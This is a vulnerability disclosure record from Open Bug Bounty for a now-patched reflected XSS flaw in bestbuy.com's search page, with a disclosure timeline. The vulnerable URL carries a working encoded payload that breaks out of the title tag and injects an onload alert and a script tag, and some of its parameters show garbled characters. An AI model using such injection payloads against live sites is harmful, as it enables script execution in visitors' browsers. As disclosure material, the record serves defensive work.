Vulnerable URL:
https://www.bestbuy.com/site/searchpage.jsp?st=%3C%2Ftitle%3E%3CBODY%2Fonload%3Dalert%28%22openbugbounty%22%29%3E%3Cscript%3E%281%29%3C%2Fscript%3E&_dyncharset=UTF-8&id;=pcat17071&type;=page≻=Global&cp;=1&nrp;=&sp;=&qp;=&list;=n⁡=true&iht;=y&usc;=All+Categories&ks;=960&keys;=keys
Details:
Description |
Value |
Patched: |
Yes, at 27.12.2017 |
Latest check for patch: |
27.12.2017 13:55 GMT |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
271 |
VIP website status: |
Yes |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
25 November, 2017 10:37 GMT |
Vulnerability existence verified and confirmed |
27 November, 2017 12:53 GMT |
Generic security notifications sent to website owner |
27 November, 2017 12:53 GMT |
Notification sent to subscribers (without technical details) |
27 November, 2017 14:17 GMT |
Vulnerability details disclosed by researcher |
27 December, 2017 13:41 GMT |
Vulnerability patched by the website owner |
27 December, 2017 13:55 GMT |